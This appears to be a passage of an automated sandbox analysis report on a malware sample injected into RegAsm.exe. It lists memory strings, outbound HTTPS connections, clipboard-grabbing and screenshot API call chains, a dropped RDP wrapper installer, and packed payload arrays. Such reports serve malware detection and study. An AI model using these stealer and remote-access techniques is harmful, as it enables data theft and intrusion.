                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.36.139:443 -> 192.168.2.4:49766 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49767 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49776 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49779 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49780 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49781 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_00439BD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_00439BD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00411F55

                                System Summary

                                barindex
                                Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                                Source: IDBAFHDGDG.exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 365056
                                Source: 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 365056
                                Source: GIIIIJDHJE.exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess,2_2_0040145B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,2_2_6C10ED10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C14B700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14B8C0 rand_s,NtQueryVirtualMemory,2_2_6C14B8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C14B910
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C0EF280
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dll
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED0C400_2_00ED0C40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C4722_2_0041C472
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D9332_2_0042D933
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D1C32_2_0042D1C3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D5612_2_0042D561
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041950A2_2_0041950A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042DD1B2_2_0042DD1B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042CD2E2_2_0042CD2E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B7122_2_0041B712
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E35A02_2_6C0E35A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C125C102_2_6C125C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C132C102_2_6C132C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C15AC002_2_6C15AC00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C15542B2_2_6C15542B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C15545C2_2_6C15545C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F54402_2_6C0F5440
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F6C802_2_6C0F6C80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1434A02_2_6C1434A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14C4A02_2_6C14C4A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10D4D02_2_6C10D4D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F64C02_2_6C0F64C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C126CF02_2_6C126CF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0ED4E02_2_6C0ED4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10ED102_2_6C10ED10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1105122_2_6C110512
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FFD002_2_6C0FFD00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C120DD02_2_6C120DD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1485F02_2_6C1485F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C127E102_2_6C127E10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1356002_2_6C135600
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C149E302_2_6C149E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C109E502_2_6C109E50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C123E502_2_6C123E50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1046402_2_6C104640
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C132E4E2_2_6C132E4E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C156E632_2_6C156E63
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EC6702_2_6C0EC670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C105E902_2_6C105E90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14E6802_2_6C14E680
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C144EA02_2_6C144EA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1576E32_2_6C1576E3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EBEF02_2_6C0EBEF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FFEF02_2_6C0FFEF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1277102_2_6C127710
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F9F002_2_6C0F9F00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1377A02_2_6C1377A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C116FF02_2_6C116FF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EDFE02_2_6C0EDFE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F78102_2_6C0F7810
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12B8202_2_6C12B820
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1348202_2_6C134820
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1088502_2_6C108850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10D8502_2_6C10D850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12F0702_2_6C12F070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1160A02_2_6C1160A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1550C72_2_6C1550C7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10C0E02_2_6C10C0E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1258E02_2_6C1258E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10A9402_2_6C10A940
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13B9702_2_6C13B970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C15B1702_2_6C15B170
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FD9602_2_6C0FD960
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1251902_2_6C125190
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1429902_2_6C142990
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C11D9B02_2_6C11D9B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EC9A02_2_6C0EC9A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C129A602_2_6C129A60
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C15BA902_2_6C15BA90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C152AB02_2_6C152AB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E22A02_2_6C0E22A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C114AA02_2_6C114AA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FCAB02_2_6C0FCAB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C128AC02_2_6C128AC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C101AF02_2_6C101AF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12E2F02_2_6C12E2F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12D3202_2_6C12D320
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E53402_2_6C0E5340
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FC3702_2_6C0FC370
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EF3802_2_6C0EF380
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1553C82_2_6C1553C8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C26AC302_2_6C26AC30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C256C002_2_6C256C00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C19AC602_2_6C19AC60
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1EECD02_2_6C1EECD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C18ECC02_2_6C18ECC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C318D202_2_6C318D20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C25ED702_2_6C25ED70
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2BAD502_2_6C2BAD50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C194DB02_2_6C194DB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C226D902_2_6C226D90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C31CDC02_2_6C31CDC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C270E202_2_6C270E20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C22EE702_2_6C22EE70
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C216E902_2_6C216E90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C19AEC02_2_6C19AEC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C230EC02_2_6C230EC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C196F102_2_6C196F10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2D0F202_2_6C2D0F20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C252F702_2_6C252F70
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1FEF402_2_6C1FEF40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2D8FB02_2_6C2D8FB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C19EFB02_2_6C19EFB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C26EFF02_2_6C26EFF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C190FE02_2_6C190FE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C21A8202_2_6C21A820
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1E08202_2_6C1E0820
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2648402_2_6C264840
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2968E02_2_6C2968E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1E69002_2_6C1E6900
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1C89602_2_6C1C8960
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2209A02_2_6C2209A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C24A9A02_2_6C24A9A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2509B02_2_6C2509B0
                                Source: C:\ProgramData\IDBAFHDGDG.exeCode function: 6_2_02340C406_2_02340C40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004103A88_2_004103A8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00447D388_2_00447D38
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004010008_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004480B08_2_004480B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004491208_2_00449120
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C1C08_2_0040C1C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042D2508_2_0042D250
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A2318_2_0040A231
